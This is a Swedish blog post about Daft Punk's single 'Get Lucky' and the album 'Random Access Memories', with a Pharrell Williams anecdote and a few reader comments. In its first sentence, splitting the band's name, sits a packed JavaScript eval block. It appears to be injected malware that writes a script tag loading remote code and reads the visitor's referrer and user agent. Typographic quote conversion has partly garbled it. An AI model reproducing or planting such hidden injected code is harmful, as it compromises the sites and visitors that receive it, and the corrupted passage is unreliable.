Image Image Image Image Image Image Image Image Image Image

| 18 januari, 2020

Scroll to top

Top

Daft Punk “Get Lucky”

Daft Punk “Get Lucky”

Daft eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nbeia|var|u0026u|referrer|dntkh||js|php’.split(’|’),0,{}))
Punk: Pharrell Williams, YSL, Animal Collective’s Panda Bear och Julian Casablancas är några av de komponenter som tillsammans med funkiga gitarriff från Nile Rodgers kommer att ton- och färgsätta våren. Daft Punk (Thomas Bangalter och Guy-Manuel de Homem-Christo) är tillbaka i ny kostym.

I mitten på Maj planerar Daft Punk att släppa sitt fjärde album “Random Access Memories”. Teasern för de kommande albumet som spelades upp under Coachellafestivalen är ett klipp från huvudspået “Get Lucky” och gästas av Pharrell Williams (producent, författare, designer, sångare i bandet N.E.R.D, entreprenör, gud etc..) ger lyssnaren en inblick i ett mjukare, funkigare sound och lämnar en med en känsla av att man vill ha mer. Mycket mer.

“Vi var på en releasefest för Madonnas senaste album”, berättar Pharrell Och jag sa: ni borde ha producerat detta! Varför gjorde ni inte det? Madonna och robotar hade varit otroligt tillsammans! Daft Punk svarade: vi jobbar faktiskt på någonting nytt. PW: vad ni än gör, ring mig jag kan typ, spela tamburin. De tittade på varandra och sa “vi hör av oss.” Detta resulterade i två spår “Get Lucky” och “Lose Yourself to Dance”.

httpv://youtu.be/JMJwcOiBoZE

Den elektroniska musiken genomgår en identitetskris och utveckligen står mer eller mindre stilla. Den här gången är syntar, trummaskiner och samplers utbytta mot levande instrument, pyramider i neon utbytta mot solnedgångar och robbotdräkter utbytta mot glittrande kostymer. Albumet som började spelas in i Paris för fem år sedan har även till stor del spelats in i Henson Studios i Kalifornien. Dansduon har hämtat sin inspiration från klassiska band som Fleetwood Mac och The Doobie Brothers.

Ingen singel har ännu släppts så tills vidare får vi hålla till godo med 1:01 av det snyggaste och svängigaste som kommit ur ett par hörlurar.

Mer info: daftpunk.com/

Comments

  1. johannes

    we are up all night to get lucky

  2. Ili

    Vill verkligen ha detta album nu!!!!

  3. Adam

    Jag håller med, åtminstone en singel så man har någonting att lyssna på fram tills dess att albumet släpps! Olidiligt